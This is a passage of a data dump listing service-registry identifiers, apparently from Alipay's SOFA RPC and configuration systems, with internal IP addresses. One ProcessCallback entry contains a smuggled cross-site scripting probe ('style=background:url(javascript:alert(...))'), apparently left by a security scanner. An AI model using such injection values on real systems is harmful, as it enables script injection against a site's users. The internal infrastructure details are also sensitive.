OFA_ROUTER","Alipay.ordercore:name=com.alipay.ordercore.drop.level.arSignLimitWhiteListConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCPlatformCreditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspectcore.common.service.sdk.bizengine.query.MetricsQueryEngine:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.ArAutomaticSupportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\" style=background:url(javascript:alert('antscanMzMwMjQ4NjktdW5pcXVlSWQtMTA1MDAzMDA1')) \"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.recharge.OperatorServicesFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.cif.common.service.facade.api.UserServiceFacade:1.0:fxwCifService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.membertangram.common.service.facade.marquee.MarqueeCollectService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.routeclient.DefaultRouteCoordinator.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradeguard.biz.tradepush.core.ProductPurchaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.maxSpanDays,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instdispute.facade.api.DisputeConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.topup.MobileNumberInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:imasp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.messagefusion.facade.api.PunishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.ForexTransInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_EBPPRECON#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.gfinvest.facade.api.during.InvestPreTSManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_CSACCURATE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acticketcore.kernel.common.service.facade.extension.AbossFacade:1.0:kAbossFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.19.29.129#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.94.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.drm7313#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbservcore.common.service.facade.kbjob.KbJobLabelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:rating@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ahaselfcure.common.facade.api.SelfCureServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.CaeMerchantFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1259_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.micloan.agdslibra.facade.service.ProductRiskCenterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_codecompass_task_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:kabaoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.credible.identity.lib.lisa.net.spi.LisaNetGateWay:1.0:Z50CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iriskmerchant.common.service.facade.merchantrisk.RiskTaskFacade:1.0:cnRiskTaskFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiangw.common.service.client.service.InsGatewayExterfaceInvokeService:1.0:instradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.creativecenter.openapi.CreativeManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finecorisk.common.facade.service.api.query.CampPrizeInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.rule.biz.manager.config.PubConfigResource.pubConditionElement,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchorder.common.service.facade.order.OrderSettleRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.smartDeductSucceedTimeCeilingStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.CertBindingQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.core.service.component.ComponentParameterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antforest.common.service.facade.CooperatePlantV2Service:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoguard.common.service.facade.metadata.api.BizModelRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insautobff:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.common.service.facade.thirdparty.ThirdPartyAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.WhiteListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.178.148#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.riskservice.spi.OpsChngSyncRiskService:1.0:finreconchecker_singleor_sync@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropgn.common.service.facade.GCRemitTaskManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.1.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.hainaprod.common.service.facade.api.mini.market.MiniMarketTemplateAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.RoleActionFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.yebscene.YebcUseVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipciTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.fop.api.ShopCampaignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitycore.common.service.facade.policy.api.QueryValidateProductsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.164.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acprodapicore.facade.service.SdkGeneratorServiceFacade:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.feeclcn.common.service.facade.BizConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yebplus.YebPlusTransferOutService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.247.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:ternbaseforinternet@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.fop.api.CrowdTagFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PUCPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unibase.common.service.facade.api.task.TaskSubmitManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ADCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundapplication.common.service.facade.api.user.AntbankAccountInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.facade.guardian.FundFilePathQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.neardata.query.api.ItemAggQueryClientService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.baitiaoprod:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pointmng_systemConfig_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.usrexp.EvalServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcorporation.biz.service.api.AlCorpConfigModelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agds.facade.institution.AgdsadPCCreditPlatformFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dasbi.daas.api.meta.DatasetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchstm_assetZsSameShopCheckCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.category.ContentCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finslip.biz.service.impl.mock.SlipDispatchMock:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.securityidentify.AlipayAuthCommonServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zskynet.facade.alarmcheck.DecisionTreeAnalyseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.122.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.diag.common.service.facade.RuleFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.chargefront:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.spcenter.facade.college.materialtag.MaterialTagFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:custview@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.loadtest.LoadTestConfigDrm.fundSecondPayCheckConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.alinode:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_CONSUMEX_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.bizprodmng:name=com.alipay.bizprodmng.biz.shared.drm.impl.ImportRowsDrmConfigImpl.controlImportRowsData,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.30.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:pcreditrecweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compass.common.service.facade.api.ReportCoverServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.145.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.customscenter:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkUriWithFormated,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.antx-server-var:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.2.228#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.authcenter.service.facade.ThirdpartyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.classPathWhiteListConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloudlego.common.service.facade.CloudlegoServiceGrayPublishFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdiscountprod.common.service.facade.ticket.api.MerchantTicketApplyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanrepayprod.common.service.facade.service.result.RestructQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexclienttrdcenter.core.service.cache.LocalCacheManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.open.activity.ActivitySignUpOpenFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opencore.service.facade.BasicFunctionsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.SecuIndividualInformationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.MarketRecordServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudlego:name=com.alipay.common.security.dresource.SecurityCommonDrm.xssCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.service.cacheclient.drm.ClientCacheConfigDRM.switchTairNewGetApi,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csisop.common.service.facade.api.PageTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotationcore.common.service.facade.api.market.SecurityMarketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.pcinstprod.pcinstprod_ds.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insiop.common.service.facade.tag.InsIopTagMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.192.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ifxquote.service.facade.api.IfxDeviationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fininflux.common.service.facade.gzone.OutfluxHistoryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aliinvoiceprod.core.service.voucher.service.VoucherRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaocore.service.facade.AlipassTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mobileaix_mobileaixProcessCallback@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.emc.common.service.facade.api.EmergencyPlanQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.facade.AlipayAuthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:vehownerprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:logrotator-app-hour-custom_hourdelimiter#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.test5@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.irisk.UniformVariableQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdistinguish.common.service.facade.ArCodeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.cds.facade.ContentDetailProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bksigncentre.common.service.facade.api.InstCooperationInfoQueryFacade:1.0:bksigncentre_instCooperationInfoQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.messagefusion.facade.api.ItemConfigSpiFacade:1.0:messagefusion-mock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fppolicygw.facade.common.facade.FppolicygwClientResultListener:1.0:agdsroalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.streammedia.common.service.facade.LivePortalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.paramcore.common.service.cache.client.api.ParmDataQueryProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:basement-polaristwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mymdp.common.service.facade.mpscore.service.test.MpsTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_DWDIS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finbatch:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mobilegeocoding:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsapiDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.biz.service.gw.community.api.promotion.PromotionGwManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkfundbuss.common.facade.onlinetest.LoadTestMockService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_TIMEOUT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.23.240.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileha.core.service.exceptionana.ClientTinyPerfMetaDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.api.BudgetUsageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cifin.bankcard.core.service.resource.drm.BankCardDrmResource.tokenMapIgnoreExpressKatong,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.fc.ContentTopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:mcashier@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grsettle.facade.api.budget.BudgetUseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmepconnector.facade.service.EpRiskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.157.252#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCCCreditAmountPromotionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.158.88.110#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promoguard.common.service.facade.capacity.api.EvaluateTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igpayrouter.common.service.facade.RefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.camphome.facade.CampHomeConfigWorkQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sportsprod.teleport.channel.protocol.TeleportTrSelfService:1.0:sportsprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:bkdatainspect@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.prodcoreTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csportal.service.facade.api.TemplateBizDataQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.100.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mashup:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.30.200.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpromoprod.common.service.facade.lcj.ActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.msgbroker.MsgBrokerListener:1.0:antbuservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.cache.service.DBZoneMappingCache:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.UserCloseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.cluster.facade.SentenceSourceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iriskmerchant.common.service.facade.merchant.MerchantCRAnalyzeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:mmtcaftscmdproc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.dataphin.openapi.OdpsTableService:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.client.api.ApiTestFacade:1.0:mrchstoreapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.preorder,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialportal.web.task.rpc.facade.activity.CreditPayFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTair.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bpm.apo.facade.QueryProcessInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.ConvertorClassloaderSwitcher.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ucdpmng.facade.content.UcdpContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmerchant.service.facade.TemplateMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.YebIncomeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accorderexprod.common.facade.spi.PreauthConsultSpiFacade:1.0:bksupplychainprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.12.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instopen.service.facade.OpRoleService:1.0:instopen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.messagefusion.facade.api.MsgBoxQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.192.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","antlescenter@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.claimoperation.common.service.AlbumSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.vostroflux.service.api.VostroAlipaySendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:gscadaudit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.ugcpublisher.UgcPublisherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.ordercore.OrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.signup.ClvSignupInfoService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:airbops_DeleteStrategyCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","girisk@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.personalprod.service.facade.autopeerpay.AutoPeerPayManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.processor.InvokeProcessor:1.0:adatabus.default.alipay.security.data.databus.send@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkdata.common.service.facade.asset.service.BoothQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.ExternalContactQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zcache.tbase.ALIPAYJSESSIONID.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchportalcore.common.service.activity.facade.gzone.assets.AssetsServiceGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.grow.api.GrowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:iglobalacqmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.minitrans.service.facade.advancepayment.api.AptransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.baitiaoprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insautomarket.common.facade.benefit.AutoBenefitGroupFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#